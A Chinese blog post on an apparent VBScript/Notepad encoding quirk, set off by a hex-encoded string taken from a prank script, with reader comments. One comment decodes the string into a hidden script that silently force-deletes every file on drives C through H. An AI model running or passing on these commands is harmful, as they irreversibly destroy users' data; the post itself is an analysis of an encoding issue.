VBS的一个BUG

标签: , , ,

在解密某个VBS脚本时,发现了VBS的一个BUG,或者准确的说应该是WSH的BUG。

运行下面的VBS脚本,看看是否报错,如果报错,请你分析原因:

S = "6D7367626F7822C4E3B2BBCAC7CED2C9FAB5C4220D0A64696D205753487368656C6C200D0A736574205753487368656C6C203D20777363726970742E6372656174656F626A6563742822777363726970742E7368656C6C2229200D0A5753487368656C6C2E72756E2022636D64202F6320222264656C20633A5C2A2E2A202F2066202F71202F732222222C30202C747275650D0A5753487368656C6C2E72756E2022636D64202F6320222264656C20643A5C2A2E2A202F2066202F71202F732222222C30202C747275650D0A5753487368656C6C2E72756E2022636D64202F6320222264656C20653A5C2A2E2A202F2066202F71202F732222222C30202C74727565200D0A5753487368656C6C2E72756E2022636D64202F6320222264656C20663A5C2A2E2A202F2066202F71202F732222222C30202C74727565200D0A5753487368656C6C2E72756E2022636D64202F6320222264656C20683A5C2A2E2A202F2066202F71202F732222222C30202C74727565200D0A2020"
赞赏

微信赞赏支付宝赞赏

随机文章:

  1. WordPress判断用户是否登录
  2. VBS学习心得
  3. jQuery设置ajax请求中的User-Agent
  4. 一个VBS恶作剧程序的解密
  5. NDS模拟器DeSmuME

6 条评论 发表在“VBS的一个BUG”上

  1. PopEye说道:

    前6个字符是VBS内置函数名msgbox

  2. 名称说道:

    msgbox”你不是我生的”
    dim WSHshell
    set WSHshell = wscript.createobject(“wscript.shell”)
    WSHshell.run “cmd /c “”del c:\*.* / f /q /s”””,0 ,true
    WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true
    WSHshell.run “cmd /c “”del e:\*.* / f /q /s”””,0 ,true
    WSHshell.run “cmd /c “”del f:\*.* / f /q /s”””,0 ,true
    WSHshell.run “cmd /c “”del h:\*.* / f /q /s”””,0 ,true

  3. 郑斯彬说道:

    这个现象我也遇到过,尤其是从网页上直接复制代码的时候比较容易出现。
    运行后,发现文件编码会变,一直都不明白为什么。

  4. 郑斯彬说道:

    我当时的测试代码和你的不同,已经不记得了。
    只是记得程序一运行就转为UNICODE,原本应该是是ANSI。
    如果想不出错,新建一个UNICODE的记事本保存运行代码就可以了。

  5. Icy_Ybk说道:

    似乎并非是 VBS 的 BUG,复制代码用记事本 ANSI 保存成 .vbs 文件,再右键记事本打开,乱码。

  6. liboyun说道:

    在记事本里保存,被擅自改成了utf-16格式?

留下回复